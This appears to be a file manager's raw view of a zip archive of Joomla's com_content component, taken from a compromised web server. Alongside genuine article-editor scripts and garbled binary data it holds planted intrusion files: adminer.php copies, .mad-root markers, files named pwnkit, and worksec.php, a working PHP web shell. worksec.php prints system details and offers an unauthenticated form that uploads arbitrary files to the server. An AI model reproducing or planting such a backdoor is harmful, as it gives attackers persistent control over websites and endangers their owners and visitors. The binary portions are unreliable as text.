File manager - Edit - /home/verseaumee/empowernetkenyajuly2026/com_content.zip
Back
PK Zk.] .mad-rootnu �[��� PK Zk.] adminer.phpnu �[��� PK Zk.]�~ ¦ � js/admin-article-pagebreak.jsnu &1i� /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (() => { window.insertPagebreak = editor => { // Get the pagebreak title let title = document.getElementById('title').value; if (!window.parent.Joomla.getOptions('xtd-pagebreak')) { // Something went wrong! window.parent.Joomla.Modal.getCurrent().close(); return false; } // Get the pagebreak toc alias -- not inserting for now don't know which attribute to use.. let alt = document.getElementById('alt').value; title = title !== '' ? `title="${title}"` : ''; alt = alt !== '' ? `alt="${alt}"` : ''; const tag = `<hr class="system-pagebreak" ${title} ${alt}>`; window.parent.Joomla.editors.instances[editor].replaceSelection(tag); window.parent.Joomla.Modal.getCurrent().close(); return false; }; })(); PK Zk.]PV�J� � ! js/admin-article-pagebreak.min.jsnu &1i� window.insertPagebreak=e=>{let t=document.getElementById("title").value;if(!window.parent.Joomla.getOptions("xtd-pagebreak"))return window.parent.Joomla.Modal.getCurrent().close(),!1;let a=document.getElementById("alt").value;t=""!==t?`title="${t}"`:"",a=""!==a?`alt="${a}"`:"";const n=`<hr class="system-pagebreak" ${t} ${a}>`;return window.parent.Joomla.editors.instances[e].replaceSelection(n),window.parent.Joomla.Modal.getCurrent().close(),!1};PK Zk.]���| | js/admin-articles-modal.jsnu &1i� /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (() => { /** * Javascript to insert the link * View element calls jSelectArticle when an article is clicked * jSelectArticle creates the link tag, sends it to the editor, * and closes the select frame. * */ window.jSelectArticle = (id, title, catid, object, link, lang) => { let hreflang = ''; if (!Joomla.getOptions('xtd-articles')) { // Something went wrong! // @TODO Close the modal return false; } const { editor } = Joomla.getOptions('xtd-articles'); if (lang !== '') { hreflang = `hreflang="${lang}"`; } const tag = `<a ${hreflang} href="${link}">${title}</a>`; window.parent.Joomla.editors.instances[editor].replaceSelection(tag); if (window.parent.Joomla.Modal) { window.parent.Joomla.Modal.getCurrent().close(); } return true; }; document.addEventListener('DOMContentLoaded', () => { // Get the elements const elements = document.querySelectorAll('.select-link'); for (let i = 0, l = elements.length; l > i; i += 1) { // Listen for click event elements[i].addEventListener('click', event => { event.preventDefault(); const { target } = event; const functionName = target.getAttribute('data-function'); if (functionName === 'jSelectArticle') { // Used in xtd_contacts window[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language')); } else { // Used in com_menus window.parent[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language')); } if (window.parent.Joomla.Modal) { window.parent.Joomla.Modal.getCurrent().close(); } }); } }); })(); PK Zk.]`gS�� � js/admin-article-readmore.min.jsnu &1i� (()=>{const e=window.Joomla.getOptions("xtd-readmore");window.insertReadmore=r=>{if(!e)throw new Error("XTD Button 'read more' not properly initialized");const o=window.Joomla.editors.instances[r].getValue();if(o){if(!o||o.match(/<hr\s+id=("|')system-readmore("|')\s*\/*>/i))return alert(e.exists),!1;Joomla.editors.instances[r].replaceSelection('<hr id="system-readmore">')}else Joomla.editors.instances[r].replaceSelection('<hr id="system-readmore">');return!0}})();PK Zk.] js/.mad-rootnu �[��� PK Zk.] js/adminer.phpnu �[��� PK Zk.]�g�� � js/admin-article-readmore.jsnu &1i� /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (() => { const options = window.Joomla.getOptions('xtd-readmore'); window.insertReadmore = editor => { if (!options) { // Something went wrong! throw new Error('XTD Button \'read more\' not properly initialized'); } const content = window.Joomla.editors.instances[editor].getValue(); if (!content) { Joomla.editors.instances[editor].replaceSelection('<hr id="system-readmore">'); } else if (content && !content.match(/<hr\s+id=("|')system-readmore("|')\s*\/*>/i)) { Joomla.editors.instances[editor].replaceSelection('<hr id="system-readmore">'); } else { // TODO replace with joomla-alert alert(options.exists); return false; } return true; }; })(); PK Zk.]B� js/admin-articles-modal.min.jsnu &1i� window.jSelectArticle=(t,e,a,n,o,i)=>{let r="";if(!Joomla.getOptions("xtd-articles"))return!1;const{editor:l}=Joomla.getOptions("xtd-articles");""!==i&&(r=`hreflang="${i}"`);const d=`<a ${r} href="${o}">${e}</a>`;return window.parent.Joomla.editors.instances[l].replaceSelection(d),window.parent.Joomla.Modal&&window.parent.Joomla.Modal.getCurrent().close(),!0},document.addEventListener("DOMContentLoaded",(()=>{const t=document.querySelectorAll(".select-link");for(let e=0,a=t.length;a>e;e+=1)t[e].addEventListener("click",(t=>{t.preventDefault();const{target:e}=t,a=e.getAttribute("data-function");"jSelectArticle"===a?window[a](e.getAttribute("data-id"),e.getAttribute("data-title"),e.getAttribute("data-cat-id"),null,e.getAttribute("data-uri"),e.getAttribute("data-language")):window.parent[a](e.getAttribute("data-id"),e.getAttribute("data-title"),e.getAttribute("data-cat-id"),null,e.getAttribute("data-uri"),e.getAttribute("data-language")),window.parent.Joomla.Modal&&window.parent.Joomla.Modal.getCurrent().close()}))}));PK Zk.] js/pwnkitnu ȯ�� PK Zk.]��; ; worksec.phpnu �[��� <?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?> PK Zk.] pwnkitnu ȯ�� PK }k.]B�S�) ) - js/admin-articles-default-batch-footer.min.jsnu &1i� ((t,e)=>{t.addEventListener("DOMContentLoaded",(()=>{const n=t.getElementById("batch-submit-button-id");n&&n.addEventListener("click",(n=>((n=>{const a=t.getElementById("adminForm");a&&"article.batch"===n&&e(n,a)})(n.target.getAttribute("data-submit-task")),!1)))}))})(document,Joomla.submitform);PK }k.]��=T� � js/articles-list.min.js.gznu &1i� � }��JC1�_E�h3p��\� ���"�m0?6�\�H���]�����o��p��r�r'����� �H��������S.QQ}��APV���"3��0(Չ�m�h:u���;̱�L�p��^�HNo2}� Q�K�y�`c�7�y�U�P�r���YNLA�#�_v9�y�-�U��4��F�L����q��'E PK }k.]pu� js/form-edit-es5.min.js.gznu &1i� � m��J1�_�͢$0���vEq!�)]�&wjh~4�(m����XD�"��p�s3�Wd����r�Y�h�v> Ԡ8�g�c�)%A:��$hݏ���$B������}�Tg4j���f+�5 �k9ɯ����*#����2!�b�f�8�?xU����g�j[� ��$��zБ�#�]��5g���!:&��d��ŽB˺���3�bnkJ��I�^�b�@�� �� XQ��]�� q��A�Jn�Bp�u�^D�~LҘ0� PK }k.]��-^� � % js/admin-article-pagebreak-es5.min.jsnu &1i� !function(){"use strict";window.insertPagebreak=function(e){var t=document.getElementById("title").value;if(!window.parent.Joomla.getOptions("xtd-pagebreak"))return window.parent.Joomla.Modal.getCurrent().close(),!1;var n=document.getElementById("alt").value,a='<hr class="system-pagebreak" '+(t=""!==t?'title="'+t+'"':"")+" "+(n=""!==n?'alt="'+n+'"':"")+">";return window.parent.Joomla.editors.instances[e].replaceSelection(a),window.parent.Joomla.Modal.getCurrent().close(),!1}}();PK }k.]��� � - js/admin-articles-default-batch-footer-es5.jsnu &1i� (function () { 'use strict'; /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (function (document, submitForm) { var buttonDataSelector = 'data-submit-task'; var formId = 'adminForm'; /** * Submit the task * @param task */ var submitTask = function submitTask(task) { var form = document.getElementById(formId); if (form && task === 'article.batch') { submitForm(task, form); } }; // Register events document.addEventListener('DOMContentLoaded', function () { var button = document.getElementById('batch-submit-button-id'); if (button) { button.addEventListener('click', function (e) { var task = e.target.getAttribute(buttonDataSelector); submitTask(task); return false; }); } }); })(document, Joomla.submitform); }()); PK }k.]���[� � 4 js/admin-articles-default-stage-footer-es5.min.js.gznu &1i� � m�M��0F��xlHr�0��i�e�9�j�E4���\B�>�%��6�S �6�*�7I,��<肙1�s�+|KNZ}��|ƀeɱS�^ٮ�6�����N�+��wZeЙ�\�^�C/N��ۖ_��I�e�f37�f �A伄]L���m+ۉ�i@�����m���rz\�e��^�E[mw��O4ܩS5ץ�tOR9C PK }k.]�'�� � js/admin-article-readmore-es5.jsnu &1i� (function () { 'use strict'; /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (function () { var options = window.Joomla.getOptions('xtd-readmore'); window.insertReadmore = function (editor) { if (!options) { // Something went wrong! throw new Error('XTD Button \'read more\' not properly initialized'); } var content = window.Joomla.editors.instances[editor].getValue(); if (!content) { Joomla.editors.instances[editor].replaceSelection('<hr id="system-readmore">'); } else if (content && !content.match(/<hr\s+id=("|')system-readmore("|')\s*\/*>/i)) { Joomla.editors.instances[editor].replaceSelection('<hr id="system-readmore">'); } else { // TODO replace with joomla-alert alert(options.exists); return false; } return true; }; })(); }()); PK }k.]�B::O O js/admin-articles-modal-es5.jsnu &1i� (function () { 'use strict'; /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (function () { /** * Javascript to insert the link * View element calls jSelectArticle when an article is clicked * jSelectArticle creates the link tag, sends it to the editor, * and closes the select frame. * */ window.jSelectArticle = function (id, title, catid, object, link, lang) { var hreflang = ''; if (!Joomla.getOptions('xtd-articles')) { // Something went wrong! // @TODO Close the modal return false; } var _Joomla$getOptions = Joomla.getOptions('xtd-articles'), editor = _Joomla$getOptions.editor; if (lang !== '') { hreflang = "hreflang=\"" + lang + "\""; } var tag = "<a " + hreflang + " href=\"" + link + "\">" + title + "</a>"; window.parent.Joomla.editors.instances[editor].replaceSelection(tag); if (window.parent.Joomla.Modal) { window.parent.Joomla.Modal.getCurrent().close(); } return true; }; document.addEventListener('DOMContentLoaded', function () { // Get the elements var elements = document.querySelectorAll('.select-link'); for (var i = 0, l = elements.length; l > i; i += 1) { // Listen for click event elements[i].addEventListener('click', function (event) { event.preventDefault(); var target = event.target; var functionName = target.getAttribute('data-function'); if (functionName === 'jSelectArticle') { // Used in xtd_contacts window[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language')); } else { // Used in com_menus window.parent[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language')); } if (window.parent.Joomla.Modal) { window.parent.Joomla.Modal.getCurrent().close(); } }); } }); })(); }()); PK }k.]���a a 1 js/admin-articles-default-batch-footer-es5.min.jsnu &1i� !function(){"use strict";!function(t,n){t.addEventListener("DOMContentLoaded",(function(){var e=t.getElementById("batch-submit-button-id");e&&e.addEventListener("click",(function(e){return function(e){var i=t.getElementById("adminForm");i&&"article.batch"===e&&n(e,i)}(e.target.getAttribute("data-submit-task")),!1}))}))}(document,Joomla.submitform)}();PK }k.]�g��� � js/articles-list-es5.min.js.gznu &1i� � ���J1�W�Ρ��XzQ+�C�Lm0�d���}wS�"(z�o>�-�5Y�9)<A-�ao��WAx w�����~%����z�:�E��2G��g��A�� �@=�Pi Ћ.u�(���8�����D����&'9g�8rЫ��p�o�~�����Y�vU$�g��M�TH�e�/���oߚ{�L1��0�8+�m=�ډ����n PK }k.]�b4� # js/admin-article-readmore.min.js.gznu &1i� � ��=O�@���B�5Ba��1QcL�bÎ�ɲCf�p���]�.WX���<3R���n�PM���{����a`{2ݲ� ЦG�T��A�?��(�!P�N��$d��|+nFf�"[sĺ� �,�����v�LD��� �e���Y�����/ڍ U�8Ϙ���N�5�̚J�s��.0���kM�4Ŧ.�R<����$䰵��:O�ʿ�[x�3�E�����֙Z��W���eQ�?`gS�� PK }k.]�ɤ q q js/form-edit.min.jsnu &1i� ((t,e)=>{const a="data-submit-task";t.addEventListener("DOMContentLoaded",(()=>{[].slice.call(t.querySelectorAll("[data-submit-task]")).forEach((l=>{l.addEventListener("click",(l=>{l.preventDefault();(a=>{const l=t.getElementById("adminForm");("article.cancel"===a||t.formvalidator.isValid(l))&&e(a,l)})(l.target.getAttribute(a))}))}))}))})(document,Joomla.submitform);PK }k.]LU�z $ js/admin-article-pagebreak.min.js.gznu &1i� � ���J�0�_% ���삋Q�(B�d� N��L�˲��Ƣx�o!��7�䃋S�C������j�,v�,ظh�7k�+�r��^;%�3���Ј�Q�4� ��71���ǐ�|gw:|�!�N�c �W�6:�B��T�n,ŌJ��Y[��o7 �6c#ee/�Oc#Ov��ݹ�5�,�P���tY�]l��9������/� Q�E�[��r)�!X̏��$,> �-�����o? PV�J� PK }k.]})HN3 3 js/form-edit-es5.jsnu &1i� (function () { 'use strict'; /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (function (document, submitForm) { var buttonDataSelector = 'data-submit-task'; var formId = 'adminForm'; /** * Submit the task * @param task */ var submitTask = function submitTask(task) { var form = document.getElementById(formId); if (task === 'article.cancel' || document.formvalidator.isValid(form)) { submitForm(task, form); } }; // Register events document.addEventListener('DOMContentLoaded', function () { var buttons = [].slice.call(document.querySelectorAll("[" + buttonDataSelector + "]")); buttons.forEach(function (button) { button.addEventListener('click', function (e) { e.preventDefault(); var task = e.target.getAttribute(buttonDataSelector); submitTask(task); }); }); }); })(document, Joomla.submitform); }()); PK }k.]�n� ( js/admin-article-pagebreak-es5.min.js.gznu &1i� � �P�J1��ݹ$a�����xP��a�Nk0�,ɤ�����Z�`o��{o�{�<{�6x�6�U��5��!�:�E��=E��'�Yb�X��<w�KGe<__ ز#P�]���e��9a,��F��v;�$ᕇ�i����9��W�M��E�e/Ug\H$U[�ś?� ���s��Ô4�ub��D#Y�Z�L|�� n� �@��;���w�r��3� B��S���J��E��'G��Q���a�����-^� PK }k.]�^;� � 0 js/admin-articles-default-batch-footer.min.js.gznu &1i� � m��j1E��b��c�:8�G - ���6&c<�B(���}��B�{�P���(�����EY��yx=��+9г�Ȣ7�ս�f�-qwy�`&�p�u�I�iU-2�hp'� WaN�ܰ������)�$���F�a0T5��ݏ�xA,��8���r�ZS��`")��SZ��n����[����s)y&��|kN�}B�S�) PK }k.]39��- - "